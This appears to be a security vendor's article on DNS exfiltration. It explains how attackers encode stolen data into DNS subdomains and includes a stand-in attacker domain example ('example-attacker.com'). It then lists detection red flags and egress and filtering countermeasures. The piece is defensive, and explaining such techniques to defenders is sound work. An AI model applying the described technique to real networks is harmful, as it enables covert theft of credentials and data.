DNS Exfiltration: How Hackers Use Your Network to Steal Data Without Detection

Cybercriminals use a wide range of techniques to steal sensitive business data, from phishing emails and credential theft to malware and insider compromise. As security defences improve, attackers continue to adapt, searching for quieter ways to bypass detection and extract valuable information, making effective data breach prevention harder than ever.

One method that is particularly hard for firms to spot is DNS exfiltration. This technique takes advantage of the Domain Name System, which plays a key role in internet communication, but is rarely monitored closely. By hiding data within routine DNS traffic, threat actors can remove information without raising alarms.

This can be used for quiet, careful data theft that offers many opportunities for hackers, such as stealing financial data, customer records or authentication credentials. Therefore, understanding how this works is critical for modern threat mitigation.

DNS is a foundational part of the internet infrastructure. It translates domain names into IP addresses, allowing browsers and applications to find and connect to websites and services. Because this is essential for normal network function, requests to DNS servers are typically allowed by default and rarely restricted by cybersecurity defenses.

This means that, unlike other protocols, DNS traffic is often not inspected closely. Many businesses instead focus their efforts on email, web or file transfer activity. As a result, DNS is frequently overlooked in security monitoring and may not be logged or filtered effectively.

This makes it an ideal channel for attackers conducting low-throughput data exfiltration. By embedding stolen data into a series of outbound DNS queries, they can transfer small amounts of information without detection. Each query appears legitimate on the surface and blends in with the thousands of DNS requests a business generates every day, making it hard for enterprise data loss prevention tools to spot.

Over time, this technique can be used to extract login credentials, internal documents or other sensitive information without triggering alerts from firewalls or traditional security tools.

Data exfiltration is the main goal of many cyberattacks. According to our latest research, 96 percent of ransomware attacks in the third quarter of 2025 attempted to steal data. DNS exfiltration is a covert technique for achieving this that abuses the normal domain name resolution process to move stolen information out of a network.

Because DNS traffic is essential for internet connectivity, it is rarely blocked, allowing attackers to hide stolen information inside routine name resolution requests that appear legitimate to most security tools. Attackers break data into small pieces which are then encoded into DNS query names, labels and subdomains that are processed by recursive resolvers and then forwarded to an attacker-controlled authoritative DNS server, where the data can be reassembled and used by threat actors.

Here’s how the process typically works:

1. Initial compromise: The attacker gains access to the target network, often through phishing, malware or an exploited vulnerability.
2. Data gathering: Once inside, the attacker locates valuable information suitable for exfiltration via DNS, such as credentials, customer records, intellectual property or financial data.
3. Data encoding: The stolen data is broken into chunks small enough to fit within the DNS character limit, which are then encoded into DNS query requests (commonly using Base32 or Base64), often using custom subdomains. For example, part of a password might be disguised as x1a2b3c.example-attacker.com.
4. Outbound transmission: The infected system sends these requests via standard DNS queries through the organization’s recursive resolver, which forwards the request to the attacker-controlled authoritative DNS server. Since DNS traffic is usually allowed by firewalls, this step often goes unnoticed.
5. Data collection: The attacker’s DNS server receives the requests, extracts and reassembles the data to complete the exfiltration.

This method can be used to steal a wide range of sensitive data, including login credentials, internal documents, customer information, encryption keys and system configurations. Because it operates through a common and trusted protocol, DNS exfiltration is difficult to detect without specific monitoring in place.

Because DNS exfiltration is designed to go unnoticed, businesses need to ensure their data loss prevention policy includes putting systems in place that can monitor and analyze DNS traffic in real-time. Without visibility into this layer, attackers may quietly extract sensitive data over weeks or months before being discovered.

However, even though DNS exfiltration is designed to be as unobtrusive as possible, there are still a few red flags that can give you a warning of such an attack in progress. These include:

• Unusually high volumes of DNS queries from a single device.
• DNS requests to unknown or rarely used domains.
• Domains with long, random-looking subdomain strings.
• Repeated queries to non-existent subdomains under the same root domain.
• DNS requests occurring at odd hours or outside normal usage patterns.
• Outbound DNS traffic to servers outside your geographic region.
• Encoded or base64-like strings embedded in DNS queries.

Any one of these may not confirm an attack, but together they can indicate a suspicious pattern of activity. Data protection management tools that use behavioral analytics can help detect these early and reduce the risk of data loss.

DNS exfiltration of data is designed to be subtle, which means that by the time it’s detected, the damage may already be done. That’s why addressing this needs to be part of any company’s data loss prevention strategy.

Businesses must take a proactive approach to monitoring DNS activity by looking for the above telltale signs of data exfiltration, as well as be able to respond quickly to shut down attempts before they can be successful. Key DNS-specific prevention measures include:

• Restricting DNS egress so endpoints can only send DNS traffic to approved internal or trusted resolvers.
• Enforcing the use of trusted DNS resolvers to prevent direct communication with attacker-controlled servers.
• Applying DNS filtering policies to block queries to suspicious, newly registered or low-reputation domains.
• Analyzing DNS query behavior to detect abnormal patterns such as long query names, excessive subdomains or high query entropy.
• Integrating DNS controls into a defense-in-depth strategy to reduce attacker dwell time and stop covert data exfiltration even after other defenses fail.